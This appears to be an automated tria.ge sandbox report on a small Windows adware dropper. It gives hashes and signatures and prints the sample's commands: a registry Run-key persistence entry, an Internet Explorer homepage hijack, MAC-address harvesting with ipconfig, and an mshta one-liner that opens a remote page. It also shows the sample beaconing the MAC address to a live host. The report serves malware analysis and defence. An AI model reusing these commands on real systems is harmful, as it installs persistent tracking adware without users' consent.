Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    153s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2024, 19:15

General

  • Target

    ac9268cb2641b313f7460ce40169e59b.exe

  • Size

    5KB

  • MD5

    ac9268cb2641b313f7460ce40169e59b

  • SHA1

    e32b781c7d15cd0e1354edd4e488e2750706e278

  • SHA256

    d3aceee88f292e6bc52b4fe8eb9de669fe612e62ed4717ef05aaaf6eea29c569

  • SHA512

    7b31c764279a959830c02a65fad81a1bcbfb8e41a6c00dcc8d68a0d6b925d782c73b8474f3e9ed1ec6e31801400886136dca459956e9201c45e83ad14c41d41f

  • SSDEEP

    96:vfycZ+ALBd3vJEtPsCZIB2oPRGHzb7v1JydcRxN:ny2tLHR4sCOD8HD117N

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://chaliang.115ku.cn/1261/yahooo.htm%22,0%29%28window.close%29

Signatures

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 60 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac9268cb2641b313f7460ce40169e59b.exe
    "C:\Users\Admin\AppData\Local\Temp\ac9268cb2641b313f7460ce40169e59b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4020
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\240632750.bat
      2⤵
      • Checks computer location settings
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4364
      • C:\Windows\SysWOW64\reg.exe
        reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d C:\Windows\Registration\runauto.vbs /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:960
      • C:\Windows\SysWOW64\regedit.exe
        Regedit /s tem.reg
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:4876
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.115ku.com/?1261/ /f
        3⤵
        • Modifies Internet Explorer settings
        • Modifies Internet Explorer start page
        PID:1848
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HOMEPAGE /t REG_DWORD /d 00000001 /f
        3⤵
          PID:1384
        • C:\Windows\SysWOW64\regedit.exe
          Regedit /s gai.reg
          3⤵
          • Runs .reg file with regedit
          PID:2424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4332
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /all
            4⤵
            • Gathers network information
            PID:1800
          • C:\Windows\SysWOW64\findstr.exe
            findstr /c:"Physical Address"
            4⤵
              PID:4916
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Windows\Registration\r.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4220
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/1261/count.asp?mac= FA:D2:FA:C7:20:2F&os=Windows_NT&ver=12610523
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1396
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1396 CREDAT:17410 /prefetch:2
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1544
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/zongtai/count.asp?mac= FA:D2:FA:C7:20:2F&os=Windows_NT&ver=12610523
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4372
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4372 CREDAT:17410 /prefetch:2
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:3948
          • C:\Windows\SysWOW64\mshta.exe
            mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://chaliang.115ku.cn/1261/yahooo.htm",0)(window.close)
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2404
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/1261/yahooo.htm
              4⤵
              • Modifies Internet Explorer settings
              PID:2060

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2BFE1D05-AD91-11EE-B6AD-FAD2FAC7202F}.dat

        Filesize

        5KB

        MD5

        3943df2bacc9c7718998d96409fa2bc8

        SHA1

        4e016d13f9f640aec8737a16271db84f4caf57c7

        SHA256

        50fad6eafb4060c91f395ca734231a64c7923d5add86fc3f2728cdd5d1143d19

        SHA512

        0a80838ce4905291b06ba7687af88071b500193f7301dfdcaf6f156a90134da55cccbc02b193389f9a6739f4ac8fe064b2836e381b04a4d4170825048412a386

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2C02E041-AD91-11EE-B6AD-FAD2FAC7202F}.dat

        Filesize

        3KB

        MD5

        96fffcbe39504886fa26e018e9fb1650

        SHA1

        55455dfd549cbd34da6e61b0eca91b925d10bdcd

        SHA256

        f6b9b735d1055221844357650a178d2d5b6508f21d9945eedc2636ff478c073b

        SHA512

        9fd3e2ba4420a08c36912912e20927d88abae4a6f8cfa52004644b4a604e0c075c0f8fd51bfb44c0c0b981e8b6bb129537b29ed690d2fcee4f26663bcffab972

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver679E.tmp

        Filesize

        15KB

        MD5

        1a545d0052b581fbb2ab4c52133846bc

        SHA1

        62f3266a9b9925cd6d98658b92adec673cbe3dd3

        SHA256

        557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

        SHA512

        bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\M8F18HYR\suggestions[1].en-US

        Filesize

        17KB

        MD5

        5a34cb996293fde2cb7a4ac89587393a

        SHA1

        3c96c993500690d1a77873cd62bc639b3a10653f

        SHA256

        c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

        SHA512

        e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

      • C:\Users\Admin\AppData\Local\Temp\240632750.bat

        Filesize

        9KB

        MD5

        52b3b486737185cd4c4eff05e3e1f864

        SHA1

        de4bda3507cc183cf72c97e5cc1ffc6332467268

        SHA256

        294f357ba1e2c985df765cb065b6386ea41398442766c34f76f18d2a149d4ae1

        SHA512

        757b8816b18374af07d597a2f58e415fcfa49eceea6cc69ec66b880d241975b9cd42be92cb39cea09f2aa1bfacec41dcb4438b122955c66166c544ad71b3774f

      • C:\Users\Admin\AppData\Local\Temp\gai.reg

        Filesize

        309B

        MD5

        8c9d7b6c427f4978944db6dcdf2905be

        SHA1

        8fb3eb9e98895a774fdd4f043205a2d7abf75ccd

        SHA256

        b70851b5596fc38203915b7803d6e6b96e2bfc4a99f7181418dc489bf4b290de

        SHA512

        8cfaa804ad8e58c8394d19d9a28b07e81c4ac52d2aaabb1eb1b16a97b6d52a4cda204f0d23557e83f9a1bfd906dec42d9cd8a88433cedd69e833ee9767508897

      • C:\Users\Admin\AppData\Local\Temp\tem.reg

        Filesize

        222B

        MD5

        6a93b828dc3fcb54b2e3919c0b3baadd

        SHA1

        63894f7f0b727cae32e583909e78928250704f74

        SHA256

        ebe5d10b0794a2374bb21f8508649abecc8c6036f49c36d504123feb3eb01764

        SHA512

        8bbf0aeb1c90df3badeae7298fadf77aceb1edf1d723e4c8e304ee0de635740a8b2807c98b277664ad8a2e1a44ae3a26c1fe793909a74191bb48d58ad81db0dd

      • C:\Users\Admin\Favorites\115┐ß╔╧═°╡╝║╜ ╔╧═°╛═╔╧115┐ß╔╧═°╡╝║╜.url

        Filesize

        132B

        MD5

        678552ee826a12311aa214128cc429d9

        SHA1

        f25d1d39cf165549be0d282c562f1e8820f4ad7a

        SHA256

        8f52283b091ae14d72cb8cfeb21f5ebfb682f534d0b63472e04015c3daf25543

        SHA512

        8cf3556e94fdbba84dbbc98045f5a5614ada95970bfe255ab6a8e1573f9c333148b119b2a7276aafeae975a5958a6fe716213d96e48d57588bbfb673a7317bcb

      • C:\Windows\Registration\r.vbs

        Filesize

        281B

        MD5

        f5e6165cade8182794e0f0f026905e1d

        SHA1

        961f1210ac90d4e08eed577877759ea0e4f1b405

        SHA256

        3b00a0ae7969fdc75a43a9fa05d21f45643e4236ae963812857f820373755368

        SHA512

        fa11ed584ccfd08a102856942c86679512ec5b94feb6337f4c53b8f62532179674fc9e4df1a4eebc40dca64e960c46e8f3467489d7d74f583652a4063910b0b2

      • memory/4020-0-0x0000000000400000-0x0000000000408000-memory.dmp

        Filesize

        32KB

      • memory/4020-92-0x0000000000400000-0x0000000000408000-memory.dmp

        Filesize

        32KB